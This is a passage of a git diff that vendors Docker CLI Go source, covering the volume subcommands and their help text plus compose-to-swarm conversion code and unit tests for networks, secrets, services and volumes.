opts.name, + Labels: runconfigopts.ConvertKVStringsToMap(opts.labels.GetAll()), + } + + vol, err := client.VolumeCreate(context.Background(), volReq) + if err != nil { + return err + } + + fmt.Fprintf(dockerCli.Out(), "%s\n", vol.Name) + return nil +} + +var createDescription = ` +Creates a new volume that containers can consume and store data in. If a name +is not specified, Docker generates a random name. You create a volume and then +configure the container to use it, for example: + + $ docker volume create hello + hello + $ docker run -d -v hello:/world busybox ls /world + +The mount is created inside the container's **/src** directory. Docker doesn't +not support relative paths for mount points inside the container. + +Multiple containers can use the same volume in the same time period. This is +useful if two containers need access to shared data. For example, if one +container writes and the other reads the data. + +## Driver specific options + +Some volume drivers may take options to customize the volume creation. Use the +**-o** or **--opt** flags to pass driver options: + + $ docker volume create --driver fake --opt tardis=blue --opt timey=wimey + +These options are passed directly to the volume driver. Options for different +volume drivers may do different things (or nothing at all). + +The built-in **local** driver on Windows does not support any options. 
+ +The built-in **local** driver on Linux accepts options similar to the linux +**mount** command: + + $ docker volume create --driver local --opt type=tmpfs --opt device=tmpfs --opt o=size=100m,uid=1000 + +Another example: + + $ docker volume create --driver local --opt type=btrfs --opt device=/dev/sda2 + +` diff --git a/vendor/github.com/docker/docker/cli/command/volume/inspect.go b/vendor/github.com/docker/docker/cli/command/volume/inspect.go new file mode 100644 index 0000000000..5eb8ad2516 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/volume/inspect.go @@ -0,0 +1,55 @@ +package volume + +import ( + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/inspect" + "github.com/spf13/cobra" +) + +type inspectOptions struct { + format string + names []string +} + +func newInspectCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts inspectOptions + + cmd := &cobra.Command{ + Use: "inspect [OPTIONS] VOLUME [VOLUME...]", + Short: "Display detailed information on one or more volumes", + Long: inspectDescription, + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.names = args + return runInspect(dockerCli, opts) + }, + } + + cmd.Flags().StringVarP(&opts.format, "format", "f", "", "Format the output using the given Go template") + + return cmd +} + +func runInspect(dockerCli *command.DockerCli, opts inspectOptions) error { + client := dockerCli.Client() + + ctx := context.Background() + + getVolFunc := func(name string) (interface{}, []byte, error) { + i, err := client.VolumeInspect(ctx, name) + return i, nil, err + } + + return inspect.Inspect(dockerCli.Out(), opts.names, opts.format, getVolFunc) +} + +var inspectDescription = ` +Returns information about one or more volumes. By default, this command renders +all results in a JSON array. 
You can specify an alternate format to execute a +given template is executed for each result. Go's https://golang.org/pkg/text/template/ +package describes all the details of the format. + +` diff --git a/vendor/github.com/docker/docker/cli/command/volume/list.go b/vendor/github.com/docker/docker/cli/command/volume/list.go new file mode 100644 index 0000000000..d76006a1b2 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/volume/list.go @@ -0,0 +1,91 @@ +package volume + +import ( + "sort" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/docker/docker/cli/command/formatter" + "github.com/docker/docker/opts" + "github.com/spf13/cobra" +) + +type byVolumeName []*types.Volume + +func (r byVolumeName) Len() int { return len(r) } +func (r byVolumeName) Swap(i, j int) { r[i], r[j] = r[j], r[i] } +func (r byVolumeName) Less(i, j int) bool { + return r[i].Name < r[j].Name +} + +type listOptions struct { + quiet bool + format string + filter opts.FilterOpt +} + +func newListCommand(dockerCli *command.DockerCli) *cobra.Command { + opts := listOptions{filter: opts.NewFilterOpt()} + + cmd := &cobra.Command{ + Use: "ls [OPTIONS]", + Aliases: []string{"list"}, + Short: "List volumes", + Long: listDescription, + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + return runList(dockerCli, opts) + }, + } + + flags := cmd.Flags() + flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display volume names") + flags.StringVar(&opts.format, "format", "", "Pretty-print volumes using a Go template") + flags.VarP(&opts.filter, "filter", "f", "Provide filter values (e.g. 
'dangling=true')") + + return cmd +} + +func runList(dockerCli *command.DockerCli, opts listOptions) error { + client := dockerCli.Client() + volumes, err := client.VolumeList(context.Background(), opts.filter.Value()) + if err != nil { + return err + } + + format := opts.format + if len(format) == 0 { + if len(dockerCli.ConfigFile().VolumesFormat) > 0 && !opts.quiet { + format = dockerCli.ConfigFile().VolumesFormat + } else { + format = formatter.TableFormatKey + } + } + + sort.Sort(byVolumeName(volumes.Volumes)) + + volumeCtx := formatter.Context{ + Output: dockerCli.Out(), + Format: formatter.NewVolumeFormat(format, opts.quiet), + } + return formatter.VolumeWrite(volumeCtx, volumes.Volumes) +} + +var listDescription = ` + +Lists all the volumes Docker manages. You can filter using the **-f** or +**--filter** flag. The filtering format is a **key=value** pair. To specify +more than one filter, pass multiple flags (for example, +**--filter "foo=bar" --filter "bif=baz"**) + +The currently supported filters are: + +* **dangling** (boolean - **true** or **false**, **1** or **0**) +* **driver** (a volume driver's name) +* **label** (**label=** or **label==**) +* **name** (a volume's name) + +` diff --git a/vendor/github.com/docker/docker/cli/command/volume/prune.go b/vendor/github.com/docker/docker/cli/command/volume/prune.go new file mode 100644 index 0000000000..405fbeb295 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/volume/prune.go @@ -0,0 +1,75 @@ +package volume + +import ( + "fmt" + + "golang.org/x/net/context" + + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + units "github.com/docker/go-units" + "github.com/spf13/cobra" +) + +type pruneOptions struct { + force bool +} + +// NewPruneCommand returns a new cobra prune command for volumes +func NewPruneCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts pruneOptions + + cmd := &cobra.Command{ + Use: "prune 
[OPTIONS]", + Short: "Remove all unused volumes", + Args: cli.NoArgs, + RunE: func(cmd *cobra.Command, args []string) error { + spaceReclaimed, output, err := runPrune(dockerCli, opts) + if err != nil { + return err + } + if output != "" { + fmt.Fprintln(dockerCli.Out(), output) + } + fmt.Fprintln(dockerCli.Out(), "Total reclaimed space:", units.HumanSize(float64(spaceReclaimed))) + return nil + }, + Tags: map[string]string{"version": "1.25"}, + } + + flags := cmd.Flags() + flags.BoolVarP(&opts.force, "force", "f", false, "Do not prompt for confirmation") + + return cmd +} + +const warning = `WARNING! This will remove all volumes not used by at least one container. +Are you sure you want to continue?` + +func runPrune(dockerCli *command.DockerCli, opts pruneOptions) (spaceReclaimed uint64, output string, err error) { + if !opts.force && !command.PromptForConfirmation(dockerCli.In(), dockerCli.Out(), warning) { + return + } + + report, err := dockerCli.Client().VolumesPrune(context.Background(), filters.Args{}) + if err != nil { + return + } + + if len(report.VolumesDeleted) > 0 { + output = "Deleted Volumes:\n" + for _, id := range report.VolumesDeleted { + output += id + "\n" + } + spaceReclaimed = report.SpaceReclaimed + } + + return +} + +// RunPrune calls the Volume Prune API +// This returns the amount of space reclaimed and a detailed output string +func RunPrune(dockerCli *command.DockerCli) (uint64, string, error) { + return runPrune(dockerCli, pruneOptions{force: true}) +} diff --git a/vendor/github.com/docker/docker/cli/command/volume/remove.go b/vendor/github.com/docker/docker/cli/command/volume/remove.go new file mode 100644 index 0000000000..f464bb3e1a --- /dev/null +++ b/vendor/github.com/docker/docker/cli/command/volume/remove.go @@ -0,0 +1,68 @@ +package volume + +import ( + "fmt" + + "golang.org/x/net/context" + + "github.com/docker/docker/cli" + "github.com/docker/docker/cli/command" + "github.com/spf13/cobra" +) + +type removeOptions struct { + 
force bool + + volumes []string +} + +func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command { + var opts removeOptions + + cmd := &cobra.Command{ + Use: "rm [OPTIONS] VOLUME [VOLUME...]", + Aliases: []string{"remove"}, + Short: "Remove one or more volumes", + Long: removeDescription, + Example: removeExample, + Args: cli.RequiresMinArgs(1), + RunE: func(cmd *cobra.Command, args []string) error { + opts.volumes = args + return runRemove(dockerCli, &opts) + }, + } + + flags := cmd.Flags() + flags.BoolVarP(&opts.force, "force", "f", false, "Force the removal of one or more volumes") + flags.SetAnnotation("force", "version", []string{"1.25"}) + return cmd +} + +func runRemove(dockerCli *command.DockerCli, opts *removeOptions) error { + client := dockerCli.Client() + ctx := context.Background() + status := 0 + + for _, name := range opts.volumes { + if err := client.VolumeRemove(ctx, name, opts.force); err != nil { + fmt.Fprintf(dockerCli.Err(), "%s\n", err) + status = 1 + continue + } + fmt.Fprintf(dockerCli.Out(), "%s\n", name) + } + + if status != 0 { + return cli.StatusError{StatusCode: status} + } + return nil +} + +var removeDescription = ` +Remove one or more volumes. You cannot remove a volume that is in use by a container. 
+` + +var removeExample = ` +$ docker volume rm hello +hello +` diff --git a/vendor/github.com/docker/docker/cli/compose/convert/compose.go b/vendor/github.com/docker/docker/cli/compose/convert/compose.go new file mode 100644 index 0000000000..8122326aa5 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/compose/convert/compose.go @@ -0,0 +1,116 @@ +package convert + +import ( + "io/ioutil" + + "github.com/docker/docker/api/types" + networktypes "github.com/docker/docker/api/types/network" + "github.com/docker/docker/api/types/swarm" + composetypes "github.com/docker/docker/cli/compose/types" +) + +const ( + // LabelNamespace is the label used to track stack resources + LabelNamespace = "com.docker.stack.namespace" +) + +// Namespace mangles names by prepending the name +type Namespace struct { + name string +} + +// Scope prepends the namespace to a name +func (n Namespace) Scope(name string) string { + return n.name + "_" + name +} + +// Name returns the name of the namespace +func (n Namespace) Name() string { + return n.name +} + +// NewNamespace returns a new Namespace for scoping of names +func NewNamespace(name string) Namespace { + return Namespace{name: name} +} + +// AddStackLabel returns labels with the namespace label added +func AddStackLabel(namespace Namespace, labels map[string]string) map[string]string { + if labels == nil { + labels = make(map[string]string) + } + labels[LabelNamespace] = namespace.name + return labels +} + +type networkMap map[string]composetypes.NetworkConfig + +// Networks converts networks from the compose-file type to the engine API type +func Networks( + namespace Namespace, + networks networkMap, + servicesNetworks map[string]struct{}, +) (map[string]types.NetworkCreate, []string) { + if networks == nil { + networks = make(map[string]composetypes.NetworkConfig) + } + + externalNetworks := []string{} + result := make(map[string]types.NetworkCreate) + + for internalName := range servicesNetworks { + network := 
networks[internalName] + if network.External.External { + externalNetworks = append(externalNetworks, network.External.Name) + continue + } + + createOpts := types.NetworkCreate{ + Labels: AddStackLabel(namespace, network.Labels), + Driver: network.Driver, + Options: network.DriverOpts, + Internal: network.Internal, + } + + if network.Ipam.Driver != "" || len(network.Ipam.Config) > 0 { + createOpts.IPAM = &networktypes.IPAM{} + } + + if network.Ipam.Driver != "" { + createOpts.IPAM.Driver = network.Ipam.Driver + } + for _, ipamConfig := range network.Ipam.Config { + config := networktypes.IPAMConfig{ + Subnet: ipamConfig.Subnet, + } + createOpts.IPAM.Config = append(createOpts.IPAM.Config, config) + } + result[internalName] = createOpts + } + + return result, externalNetworks +} + +// Secrets converts secrets from the Compose type to the engine API type +func Secrets(namespace Namespace, secrets map[string]composetypes.SecretConfig) ([]swarm.SecretSpec, error) { + result := []swarm.SecretSpec{} + for name, secret := range secrets { + if secret.External.External { + continue + } + + data, err := ioutil.ReadFile(secret.File) + if err != nil { + return nil, err + } + + result = append(result, swarm.SecretSpec{ + Annotations: swarm.Annotations{ + Name: namespace.Scope(name), + Labels: AddStackLabel(namespace, secret.Labels), + }, + Data: data, + }) + } + return result, nil +} diff --git a/vendor/github.com/docker/docker/cli/compose/convert/compose_test.go b/vendor/github.com/docker/docker/cli/compose/convert/compose_test.go new file mode 100644 index 0000000000..f333d73fda --- /dev/null +++ b/vendor/github.com/docker/docker/cli/compose/convert/compose_test.go @@ -0,0 +1,122 @@ +package convert + +import ( + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/network" + composetypes "github.com/docker/docker/cli/compose/types" + "github.com/docker/docker/pkg/testutil/assert" + "github.com/docker/docker/pkg/testutil/tempfile" +) + 
+func TestNamespaceScope(t *testing.T) { + scoped := Namespace{name: "foo"}.Scope("bar") + assert.Equal(t, scoped, "foo_bar") +} + +func TestAddStackLabel(t *testing.T) { + labels := map[string]string{ + "something": "labeled", + } + actual := AddStackLabel(Namespace{name: "foo"}, labels) + expected := map[string]string{ + "something": "labeled", + LabelNamespace: "foo", + } + assert.DeepEqual(t, actual, expected) +} + +func TestNetworks(t *testing.T) { + namespace := Namespace{name: "foo"} + source := networkMap{ + "normal": composetypes.NetworkConfig{ + Driver: "overlay", + DriverOpts: map[string]string{ + "opt": "value", + }, + Ipam: composetypes.IPAMConfig{ + Driver: "driver", + Config: []*composetypes.IPAMPool{ + { + Subnet: "10.0.0.0", + }, + }, + }, + Labels: map[string]string{ + "something": "labeled", + }, + }, + "outside": composetypes.NetworkConfig{ + External: composetypes.External{ + External: true, + Name: "special", + }, + }, + } + expected := map[string]types.NetworkCreate{ + "default": { + Labels: map[string]string{ + LabelNamespace: "foo", + }, + }, + "normal": { + Driver: "overlay", + IPAM: &network.IPAM{ + Driver: "driver", + Config: []network.IPAMConfig{ + { + Subnet: "10.0.0.0", + }, + }, + }, + Options: map[string]string{ + "opt": "value", + }, + Labels: map[string]string{ + LabelNamespace: "foo", + "something": "labeled", + }, + }, + } + + serviceNetworks := map[string]struct{}{ + "default": {}, + "normal": {}, + "outside": {}, + } + networks, externals := Networks(namespace, source, serviceNetworks) + assert.DeepEqual(t, networks, expected) + assert.DeepEqual(t, externals, []string{"special"}) +} + +func TestSecrets(t *testing.T) { + namespace := Namespace{name: "foo"} + + secretText := "this is the first secret" + secretFile := tempfile.NewTempFile(t, "convert-secrets", secretText) + defer secretFile.Remove() + + source := map[string]composetypes.SecretConfig{ + "one": { + File: secretFile.Name(), + Labels: map[string]string{"monster": 
"mash"}, + }, + "ext": { + External: composetypes.External{ + External: true, + }, + }, + } + + specs, err := Secrets(namespace, source) + assert.NilError(t, err) + assert.Equal(t, len(specs), 1) + secret := specs[0] + assert.Equal(t, secret.Name, "foo_one") + assert.DeepEqual(t, secret.Labels, map[string]string{ + "monster": "mash", + LabelNamespace: "foo", + }) + assert.DeepEqual(t, secret.Data, []byte(secretText)) +} diff --git a/vendor/github.com/docker/docker/cli/compose/convert/service.go b/vendor/github.com/docker/docker/cli/compose/convert/service.go new file mode 100644 index 0000000000..4a5489562c --- /dev/null +++ b/vendor/github.com/docker/docker/cli/compose/convert/service.go @@ -0,0 +1,416 @@ +package convert + +import ( + "fmt" + "os" + "sort" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/swarm" + servicecli "github.com/docker/docker/cli/command/service" + composetypes "github.com/docker/docker/cli/compose/types" + "github.com/docker/docker/client" + "github.com/docker/docker/opts" + runconfigopts "github.com/docker/docker/runconfig/opts" + "github.com/docker/go-connections/nat" +) + +// Services from compose-file types to engine API types +// TODO: fix secrets API so that SecretAPIClient is not required here +func Services( + namespace Namespace, + config *composetypes.Config, + client client.SecretAPIClient, +) (map[string]swarm.ServiceSpec, error) { + result := make(map[string]swarm.ServiceSpec) + + services := config.Services + volumes := config.Volumes + networks := config.Networks + + for _, service := range services { + + secrets, err := convertServiceSecrets(client, namespace, service.Secrets, config.Secrets) + if err != nil { + return nil, err + } + serviceSpec, err := convertService(namespace, service, networks, volumes, secrets) + if err != nil { + return nil, err + } + result[service.Name] = serviceSpec + } + + return result, nil +} + +func 
convertService( + namespace Namespace, + service composetypes.ServiceConfig, + networkConfigs map[string]composetypes.NetworkConfig, + volumes map[string]composetypes.VolumeConfig, + secrets []*swarm.SecretReference, +) (swarm.ServiceSpec, error) { + name := namespace.Scope(service.Name) + + endpoint, err := convertEndpointSpec(service.Ports) + if err != nil { + return swarm.ServiceSpec{}, err + } + + mode, err := convertDeployMode(service.Deploy.Mode, service.Deploy.Replicas) + if err != nil { + return swarm.ServiceSpec{}, err + } + + mounts, err := Volumes(service.Volumes, volumes, namespace) + if err != nil { + // TODO: better error message (include service name) + return swarm.ServiceSpec{}, err + } + + resources, err := convertResources(service.Deploy.Resources) + if err != nil { + return swarm.ServiceSpec{}, err + } + + restartPolicy, err := convertRestartPolicy( + service.Restart, service.Deploy.RestartPolicy) + if err != nil { + return swarm.ServiceSpec{}, err + } + + healthcheck, err := convertHealthcheck(service.HealthCheck) + if err != nil { + return swarm.ServiceSpec{}, err + } + + networks, err := convertServiceNetworks(service.Networks, networkConfigs, namespace, service.Name) + if err != nil { + return swarm.ServiceSpec{}, err + } + + var logDriver *swarm.Driver + if service.Logging != nil { + logDriver = &swarm.Driver{ + Name: service.Logging.Driver, + Options: service.Logging.Options, + } + } + + serviceSpec := swarm.ServiceSpec{ + Annotations: swarm.Annotations{ + Name: name, + Labels: AddStackLabel(namespace, service.Deploy.Labels), + }, + TaskTemplate: swarm.TaskSpec{ + ContainerSpec: swarm.ContainerSpec{ + Image: service.Image, + Command: service.Entrypoint, + Args: service.Command, + Hostname: service.Hostname, + Hosts: sortStrings(convertExtraHosts(service.ExtraHosts)), + Healthcheck: healthcheck, + Env: sortStrings(convertEnvironment(service.Environment)), + Labels: AddStackLabel(namespace, service.Labels), + Dir: service.WorkingDir, + User: 
service.User, + Mounts: mounts, + StopGracePeriod: service.StopGracePeriod, + TTY: service.Tty, + OpenStdin: service.StdinOpen, + Secrets: secrets, + }, + LogDriver: logDriver, + Resources: resources, + RestartPolicy: restartPolicy, + Placement: &swarm.Placement{ + Constraints: service.Deploy.Placement.Constraints, + }, + }, + EndpointSpec: endpoint, + Mode: mode, + Networks: networks, + UpdateConfig: convertUpdateConfig(service.Deploy.UpdateConfig), + } + + return serviceSpec, nil +} + +func sortStrings(strs []string) []string { + sort.Strings(strs) + return strs +} + +type byNetworkTarget []swarm.NetworkAttachmentConfig + +func (a byNetworkTarget) Len() int { return len(a) } +func (a byNetworkTarget) Swap(i, j int) { a[i], a[j] = a[j], a[i] } +func (a byNetworkTarget) Less(i, j int) bool { return a[i].Target < a[j].Target } + +func convertServiceNetworks( + networks map[string]*composetypes.ServiceNetworkConfig, + networkConfigs networkMap, + namespace Namespace, + name string, +) ([]swarm.NetworkAttachmentConfig, error) { + if len(networks) == 0 { + return []swarm.NetworkAttachmentConfig{ + { + Target: namespace.Scope("default"), + Aliases: []string{name}, + }, + }, nil + } + + nets := []swarm.NetworkAttachmentConfig{} + for networkName, network := range networks { + networkConfig, ok := networkConfigs[networkName] + if !ok { + return []swarm.NetworkAttachmentConfig{}, fmt.Errorf( + "service %q references network %q, which is not declared", name, networkName) + } + var aliases []string + if network != nil { + aliases = network.Aliases + } + target := namespace.Scope(networkName) + if networkConfig.External.External { + target = networkConfig.External.Name + } + nets = append(nets, swarm.NetworkAttachmentConfig{ + Target: target, + Aliases: append(aliases, name), + }) + } + + sort.Sort(byNetworkTarget(nets)) + + return nets, nil +} + +// TODO: fix secrets API so that SecretAPIClient is not required here +func convertServiceSecrets( + client 
client.SecretAPIClient, + namespace Namespace, + secrets []composetypes.ServiceSecretConfig, + secretSpecs map[string]composetypes.SecretConfig, +) ([]*swarm.SecretReference, error) { + opts := []*types.SecretRequestOption{} + for _, secret := range secrets { + target := secret.Target + if target == "" { + target = secret.Source + } + + source := namespace.Scope(secret.Source) + secretSpec := secretSpecs[secret.Source] + if secretSpec.External.External { + source = secretSpec.External.Name + } + + uid := secret.UID + gid := secret.GID + if uid == "" { + uid = "0" + } + if gid == "" { + gid = "0" + } + + opts = append(opts, &types.SecretRequestOption{ + Source: source, + Target: target, + UID: uid, + GID: gid, + Mode: os.FileMode(secret.Mode), + }) + } + + return servicecli.ParseSecrets(client, opts) +} + +func convertExtraHosts(extraHosts map[string]string) []string { + hosts := []string{} + for host, ip := range extraHosts { + hosts = append(hosts, fmt.Sprintf("%s %s", ip, host)) + } + return hosts +} + +func convertHealthcheck(healthcheck *composetypes.HealthCheckConfig) (*container.HealthConfig, error) { + if healthcheck == nil { + return nil, nil + } + var ( + err error + timeout, interval time.Duration + retries int + ) + if healthcheck.Disable { + if len(healthcheck.Test) != 0 { + return nil, fmt.Errorf("test and disable can't be set at the same time") + } + return &container.HealthConfig{ + Test: []string{"NONE"}, + }, nil + + } + if healthcheck.Timeout != "" { + timeout, err = time.ParseDuration(healthcheck.Timeout) + if err != nil { + return nil, err + } + } + if healthcheck.Interval != "" { + interval, err = time.ParseDuration(healthcheck.Interval) + if err != nil { + return nil, err + } + } + if healthcheck.Retries != nil { + retries = int(*healthcheck.Retries) + } + return &container.HealthConfig{ + Test: healthcheck.Test, + Timeout: timeout, + Interval: interval, + Retries: retries, + }, nil +} + +func convertRestartPolicy(restart string, source 
*composetypes.RestartPolicy) (*swarm.RestartPolicy, error) { + // TODO: log if restart is being ignored + if source == nil { + policy, err := runconfigopts.ParseRestartPolicy(restart) + if err != nil { + return nil, err + } + switch { + case policy.IsNone(): + return nil, nil + case policy.IsAlways(), policy.IsUnlessStopped(): + return &swarm.RestartPolicy{ + Condition: swarm.RestartPolicyConditionAny, + }, nil + case policy.IsOnFailure(): + attempts := uint64(policy.MaximumRetryCount) + return &swarm.RestartPolicy{ + Condition: swarm.RestartPolicyConditionOnFailure, + MaxAttempts: &attempts, + }, nil + default: + return nil, fmt.Errorf("unknown restart policy: %s", restart) + } + } + return &swarm.RestartPolicy{ + Condition: swarm.RestartPolicyCondition(source.Condition), + Delay: source.Delay, + MaxAttempts: source.MaxAttempts, + Window: source.Window, + }, nil +} + +func convertUpdateConfig(source *composetypes.UpdateConfig) *swarm.UpdateConfig { + if source == nil { + return nil + } + parallel := uint64(1) + if source.Parallelism != nil { + parallel = *source.Parallelism + } + return &swarm.UpdateConfig{ + Parallelism: parallel, + Delay: source.Delay, + FailureAction: source.FailureAction, + Monitor: source.Monitor, + MaxFailureRatio: source.MaxFailureRatio, + } +} + +func convertResources(source composetypes.Resources) (*swarm.ResourceRequirements, error) { + resources := &swarm.ResourceRequirements{} + var err error + if source.Limits != nil { + var cpus int64 + if source.Limits.NanoCPUs != "" { + cpus, err = opts.ParseCPUs(source.Limits.NanoCPUs) + if err != nil { + return nil, err + } + } + resources.Limits = &swarm.Resources{ + NanoCPUs: cpus, + MemoryBytes: int64(source.Limits.MemoryBytes), + } + } + if source.Reservations != nil { + var cpus int64 + if source.Reservations.NanoCPUs != "" { + cpus, err = opts.ParseCPUs(source.Reservations.NanoCPUs) + if err != nil { + return nil, err + } + } + resources.Reservations = &swarm.Resources{ + NanoCPUs: cpus, + 
MemoryBytes: int64(source.Reservations.MemoryBytes), + } + } + return resources, nil + +} + +type byPublishedPort []swarm.PortConfig + +func (a byPublishedPort) Len() int { return len(a) } +func (a byPublishedPort) Swap(i, j int) { a[i], a[j] = a[j], a[i] } +func (a byPublishedPort) Less(i, j int) bool { return a[i].PublishedPort < a[j].PublishedPort } + +func convertEndpointSpec(source []string) (*swarm.EndpointSpec, error) { + portConfigs := []swarm.PortConfig{} + ports, portBindings, err := nat.ParsePortSpecs(source) + if err != nil { + return nil, err + } + + for port := range ports { + portConfigs = append( + portConfigs, + opts.ConvertPortToPortConfig(port, portBindings)...) + } + + // Sorting to make sure these are always in the same order + sort.Sort(byPublishedPort(portConfigs)) + + return &swarm.EndpointSpec{Ports: portConfigs}, nil +} + +func convertEnvironment(source map[string]string) []string { + var output []string + + for name, value := range source { + output = append(output, fmt.Sprintf("%s=%s", name, value)) + } + + return output +} + +func convertDeployMode(mode string, replicas *uint64) (swarm.ServiceMode, error) { + serviceMode := swarm.ServiceMode{} + + switch mode { + case "global": + if replicas != nil { + return serviceMode, fmt.Errorf("replicas can only be used with replicated mode") + } + serviceMode.Global = &swarm.GlobalService{} + case "replicated", "": + serviceMode.Replicated = &swarm.ReplicatedService{Replicas: replicas} + default: + return serviceMode, fmt.Errorf("Unknown mode: %s", mode) + } + return serviceMode, nil +} diff --git a/vendor/github.com/docker/docker/cli/compose/convert/service_test.go b/vendor/github.com/docker/docker/cli/compose/convert/service_test.go new file mode 100644 index 0000000000..2e614d730c --- /dev/null +++ b/vendor/github.com/docker/docker/cli/compose/convert/service_test.go @@ -0,0 +1,216 @@ +package convert + +import ( + "sort" + "strings" + "testing" + "time" + + 
"github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/swarm" + composetypes "github.com/docker/docker/cli/compose/types" + "github.com/docker/docker/pkg/testutil/assert" +) + +func TestConvertRestartPolicyFromNone(t *testing.T) { + policy, err := convertRestartPolicy("no", nil) + assert.NilError(t, err) + assert.Equal(t, policy, (*swarm.RestartPolicy)(nil)) +} + +func TestConvertRestartPolicyFromUnknown(t *testing.T) { + _, err := convertRestartPolicy("unknown", nil) + assert.Error(t, err, "unknown restart policy: unknown") +} + +func TestConvertRestartPolicyFromAlways(t *testing.T) { + policy, err := convertRestartPolicy("always", nil) + expected := &swarm.RestartPolicy{ + Condition: swarm.RestartPolicyConditionAny, + } + assert.NilError(t, err) + assert.DeepEqual(t, policy, expected) +} + +func TestConvertRestartPolicyFromFailure(t *testing.T) { + policy, err := convertRestartPolicy("on-failure:4", nil) + attempts := uint64(4) + expected := &swarm.RestartPolicy{ + Condition: swarm.RestartPolicyConditionOnFailure, + MaxAttempts: &attempts, + } + assert.NilError(t, err) + assert.DeepEqual(t, policy, expected) +} + +func TestConvertEnvironment(t *testing.T) { + source := map[string]string{ + "foo": "bar", + "key": "value", + } + env := convertEnvironment(source) + sort.Strings(env) + assert.DeepEqual(t, env, []string{"foo=bar", "key=value"}) +} + +func TestConvertResourcesFull(t *testing.T) { + source := composetypes.Resources{ + Limits: &composetypes.Resource{ + NanoCPUs: "0.003", + MemoryBytes: composetypes.UnitBytes(300000000), + }, + Reservations: &composetypes.Resource{ + NanoCPUs: "0.002", + MemoryBytes: composetypes.UnitBytes(200000000), + }, + } + resources, err := convertResources(source) + assert.NilError(t, err) + + expected := &swarm.ResourceRequirements{ + Limits: &swarm.Resources{ + NanoCPUs: 3000000, + MemoryBytes: 300000000, + }, + Reservations: &swarm.Resources{ + NanoCPUs: 2000000, + MemoryBytes: 200000000, + }, + } + 
assert.DeepEqual(t, resources, expected) +} + +func TestConvertResourcesOnlyMemory(t *testing.T) { + source := composetypes.Resources{ + Limits: &composetypes.Resource{ + MemoryBytes: composetypes.UnitBytes(300000000), + }, + Reservations: &composetypes.Resource{ + MemoryBytes: composetypes.UnitBytes(200000000), + }, + } + resources, err := convertResources(source) + assert.NilError(t, err) + + expected := &swarm.ResourceRequirements{ + Limits: &swarm.Resources{ + MemoryBytes: 300000000, + }, + Reservations: &swarm.Resources{ + MemoryBytes: 200000000, + }, + } + assert.DeepEqual(t, resources, expected) +} + +func TestConvertHealthcheck(t *testing.T) { + retries := uint64(10) + source := &composetypes.HealthCheckConfig{ + Test: []string{"EXEC", "touch", "/foo"}, + Timeout: "30s", + Interval: "2ms", + Retries: &retries, + } + expected := &container.HealthConfig{ + Test: source.Test, + Timeout: 30 * time.Second, + Interval: 2 * time.Millisecond, + Retries: 10, + } + + healthcheck, err := convertHealthcheck(source) + assert.NilError(t, err) + assert.DeepEqual(t, healthcheck, expected) +} + +func TestConvertHealthcheckDisable(t *testing.T) { + source := &composetypes.HealthCheckConfig{Disable: true} + expected := &container.HealthConfig{ + Test: []string{"NONE"}, + } + + healthcheck, err := convertHealthcheck(source) + assert.NilError(t, err) + assert.DeepEqual(t, healthcheck, expected) +} + +func TestConvertHealthcheckDisableWithTest(t *testing.T) { + source := &composetypes.HealthCheckConfig{ + Disable: true, + Test: []string{"EXEC", "touch"}, + } + _, err := convertHealthcheck(source) + assert.Error(t, err, "test and disable can't be set") +} + +func TestConvertServiceNetworksOnlyDefault(t *testing.T) { + networkConfigs := networkMap{} + networks := map[string]*composetypes.ServiceNetworkConfig{} + + configs, err := convertServiceNetworks( + networks, networkConfigs, NewNamespace("foo"), "service") + + expected := []swarm.NetworkAttachmentConfig{ + { + Target: 
"foo_default", + Aliases: []string{"service"}, + }, + } + + assert.NilError(t, err) + assert.DeepEqual(t, configs, expected) +} + +func TestConvertServiceNetworks(t *testing.T) { + networkConfigs := networkMap{ + "front": composetypes.NetworkConfig{ + External: composetypes.External{ + External: true, + Name: "fronttier", + }, + }, + "back": composetypes.NetworkConfig{}, + } + networks := map[string]*composetypes.ServiceNetworkConfig{ + "front": { + Aliases: []string{"something"}, + }, + "back": { + Aliases: []string{"other"}, + }, + } + + configs, err := convertServiceNetworks( + networks, networkConfigs, NewNamespace("foo"), "service") + + expected := []swarm.NetworkAttachmentConfig{ + { + Target: "foo_back", + Aliases: []string{"other", "service"}, + }, + { + Target: "fronttier", + Aliases: []string{"something", "service"}, + }, + } + + sortedConfigs := byTargetSort(configs) + sort.Sort(&sortedConfigs) + + assert.NilError(t, err) + assert.DeepEqual(t, []swarm.NetworkAttachmentConfig(sortedConfigs), expected) +} + +type byTargetSort []swarm.NetworkAttachmentConfig + +func (s byTargetSort) Len() int { + return len(s) +} + +func (s byTargetSort) Less(i, j int) bool { + return strings.Compare(s[i].Target, s[j].Target) < 0 +} + +func (s byTargetSort) Swap(i, j int) { + s[i], s[j] = s[j], s[i] +} diff --git a/vendor/github.com/docker/docker/cli/compose/convert/volume.go b/vendor/github.com/docker/docker/cli/compose/convert/volume.go new file mode 100644 index 0000000000..24442d4dc7 --- /dev/null +++ b/vendor/github.com/docker/docker/cli/compose/convert/volume.go @@ -0,0 +1,128 @@ +package convert + +import ( + "fmt" + "strings" + + "github.com/docker/docker/api/types/mount" + composetypes "github.com/docker/docker/cli/compose/types" +) + +type volumes map[string]composetypes.VolumeConfig + +// Volumes from compose-file types to engine api types +func Volumes(serviceVolumes []string, stackVolumes volumes, namespace Namespace) ([]mount.Mount, error) { + var mounts 
